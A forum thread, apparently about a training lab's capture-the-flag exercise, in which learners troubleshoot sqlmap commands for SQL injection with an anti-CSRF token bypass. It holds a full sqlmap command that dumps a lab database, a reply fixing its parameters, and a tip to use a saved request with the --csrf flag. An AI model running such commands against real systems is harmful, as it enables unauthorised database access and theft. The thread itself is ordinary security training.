Hello everyone!
I’ve been trying to get the flag 8 wich is “anti-CSRF token bypass”
So far I’m trying to use the following command but with no results:
sqlmap -u ‘178.62.63.223:30888/case8.php?id=1’ --data=“id=1&csrf-token=DsRfWoI75zL4PEhyhnxhyjP0b7CRB8JvIaM6s6Xw” --csrf-token=“t0ken” --dump --batch --level 5 --risk 3
Someone can please give me a tip ?
Hey! Looks like you have a few issues:
# You have GET params, but are using the --data
sqlmap -u ‘178.62.63.223:30888/case8.php?id=1’switch.
# T0ken parameter names don't match
--data=“id=1&csrf-token=DsRfWoI75zL4PEhyhnxhyjP0b7CRB8JvIaM6s6Xw” --csrf-token=“t0ken”
# You probably don't need level or risk once you get the other stuff fixed.
--dump --batch --level 5 --risk 3
You are getting close. Keep going.
-onthesauce
Than you man.
I’m sorry for the late response. You saving me again, seriously I LOVE YOU
hello!
ok now i am stuck from days… i am facing the error with all i can do with the machine … i am trying following options in my query
anti-CSRF token ‘t0ken’ can’t be found at ‘http://206.189.118.125:32235/case8.php’. You can try to rerun by providing a valid value for option ‘–csrf-url’
and receiving following error
anti-CSRF token ‘t0ken’ can’t be found at ‘http://206.189.118.125:32235/case8.php’. You can try to rerun by providing a valid value for option ‘–csrf-url’
can anyone tell me what is wrong in my sqlmap
more foolproof and super easy method just to save the request and use -r request,req and just add the --csrf flag 
Cool challenges!
Interestingly, it is possible to do this manually without peeking into the sqlmap output? 